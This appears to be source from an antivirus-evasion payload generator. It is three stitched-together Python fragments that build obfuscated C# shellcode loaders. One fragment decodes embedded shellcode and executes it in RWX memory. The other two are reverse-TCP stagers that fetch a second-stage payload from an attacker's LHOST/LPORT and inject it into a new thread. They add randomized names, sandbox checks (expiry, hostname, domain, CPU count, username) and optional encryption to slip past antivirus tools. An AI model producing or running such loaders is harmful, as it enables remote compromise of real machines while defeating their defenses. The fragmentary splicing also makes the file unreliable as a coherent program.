    # overwritten below by the count returned from gamemaker
    num_tabs_required = 0

    # get 12 random variables for the API imports (17 for the heap variant)
    r = [evasion_helpers.randomString() for x in range(12)]
    y = [evasion_helpers.randomString() for x in range(17)]

    # required syntax at the beginning of any/all payloads
    payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
    payload_code += "namespace %s { class %s {\n" % (namespaceName, className)
    # P/Invoke declarations precede Main(); the class/namespace are closed by the
    # brace loop at the end, not by these strings
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])

    payload_code += "static void Main() {\n"
    # presumably senecas_games returns (gate code, number of opened blocks) —
    # the closing loop below relies on that count; +2 accounts for class and namespace
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    num_tabs_required += 2

    # runtime decode: base64 -> ASCII "0x..,0x.." text -> byte[] via hex parse
    payload_code += '\t' * num_tabs_required + "string %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(\"%s\"));" % (bytearrayName, Shellcode)
    payload_code += '\t' * num_tabs_required + "string[] chars = %s.Split(',').ToArray();\n" % (bytearrayName)
    payload_code += '\t' * num_tabs_required + "byte[] %s = new byte[chars.Length];\n" % (shellcodeName)
    payload_code += '\t' * num_tabs_required + "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % (shellcodeName)

    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # 0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE (see the
        # commented-out constants line below); 0xFFFFFFFF is INFINITE; the
        # trailing '}' ends Main()
        payload_code += '\t' * num_tabs_required + "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, shellcodeName)
        payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (shellcodeName, funcAddrName, shellcodeName)
        payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % (hThreadName, threadIdName, pinfoName)
        payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % (hThreadName)
        # payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        # 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE, 0x00000008 is HEAP_ZERO_MEMORY;
        # the doubled "}}" in the last .format() string ends Main()
        rand_heap = evasion_helpers.randomString()
        rand_ptr = evasion_helpers.randomString()
        rand_var = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(rand_heap, bytearrayName)
        payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(rand_ptr, rand_heap, bytearrayName)
        payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(rand_ptr, bytearrayName, bytearrayName)
        payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(rand_var)
        payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, rand_ptr, rand_var)
        payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format(hThreadName)

    # close every gate block plus the class and namespace
    while (num_tabs_required != 0):
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1

    # optional whole-source transformation defined in the encryption module
    if self.required_options["USE_ARYA"][0].lower() == "y":
        payload_code = encryption.arya(payload_code)

    self.payload_source_code = payload_code
    return
def generate(self): getDataName = helpers.randomString() injectName = helpers.randomString() payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n" payload_code += "namespace %s { class %s {\n" % ( helpers.randomString(), helpers.randomString()) hostName = helpers.randomString() portName = helpers.randomString() ipName = helpers.randomString() sockName = helpers.randomString() length_rawName = helpers.randomString() lengthName = helpers.randomString() sName = helpers.randomString() total_bytesName = helpers.randomString() handleName = helpers.randomString() payload_code += "static byte[] %s(string %s, int %s) {\n" % ( getDataName, hostName, portName) payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % ( ipName, hostName, portName) payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % ( sockName) payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName) payload_code += " catch { return null;}\n" payload_code += " byte[] %s = new byte[4];\n" % (length_rawName) payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName) payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % ( lengthName, length_rawName) payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName) payload_code += " int %s = 0;\n" % (total_bytesName) payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName) payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? 
(%s - %s) : 4096, 0);}\n" % ( total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName) payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % ( handleName, sockName) payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % ( handleName, sName, sName) payload_code += " return %s;}\n" % (sName) sName = helpers.randomString() funcAddrName = helpers.randomString() hThreadName = helpers.randomString() threadIdName = helpers.randomString() pinfoName = helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, 
funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) sName = helpers.randomString() curlyCount = 0 payload_code += "static void Main(){\n" payload_code2, curlyCount = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % ( sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += " %s(%s); }\n" % (injectName, sName) while (curlyCount != 0): payload_code += '\t' * curlyCount + '}' curlyCount -= 1 # get 12 random variables for the API imports r = [helpers.randomString() for x in range(12)] y = [helpers.randomString() for x in range(17)] if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], 
y[15], y[16]) if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): getDataName = helpers.randomString() injectName = helpers.randomString() payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n" payload_code += "namespace %s { class %s {\n" % ( helpers.randomString(), helpers.randomString()) hostName = helpers.randomString() portName = helpers.randomString() ipName = helpers.randomString() sockName = helpers.randomString() length_rawName = helpers.randomString() lengthName = helpers.randomString() sName = helpers.randomString() total_bytesName = helpers.randomString() handleName = helpers.randomString() payload_code += "static byte[] %s(string %s, int %s) {\n" % ( getDataName, hostName, portName) payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % ( ipName, hostName, portName) payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % ( sockName) payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName) payload_code += " catch { return null;}\n" payload_code += " byte[] %s = new byte[4];\n" % (length_rawName) payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName) payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % ( lengthName, length_rawName) payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName) payload_code += " int %s = 0;\n" % (total_bytesName) payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName) payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? 
(%s - %s) : 4096, 0);}\n" % ( total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName) payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % ( handleName, sockName) payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % ( handleName, sName, sName) payload_code += " return %s;}\n" % (sName) sName = helpers.randomString() funcAddrName = helpers.randomString() hThreadName = helpers.randomString() threadIdName = helpers.randomString() pinfoName = helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, 
funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) sName = helpers.randomString() randomName = helpers.randomString() curlyCount = 0 payload_code += "static void Main(){\n" if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = helpers.randomString() RandExpire = helpers.randomString() # Create Payload code payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format( RandToday) payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0]) payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check curlyCount += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( self.required_options["HOSTNAME"][0].lower()) # Add a tab for this check curlyCount += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check curlyCount += 1 if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( self.required_options["PROCESSORS"][0]) # Add a tab for this check curlyCount += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = helpers.randomString() rand_char_name = helpers.randomString() payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, self.required_options["USERNAME"][0]) # 
Add a tab for this check curlyCount += 1 payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % ( sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += " %s(%s); }\n" % (injectName, sName) while (curlyCount != 0): payload_code += '\t' * curlyCount + '}' curlyCount -= 1 # get 12 random variables for the API imports r = [helpers.randomString() for x in range(12)] y = [helpers.randomString() for x in range(17)] if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return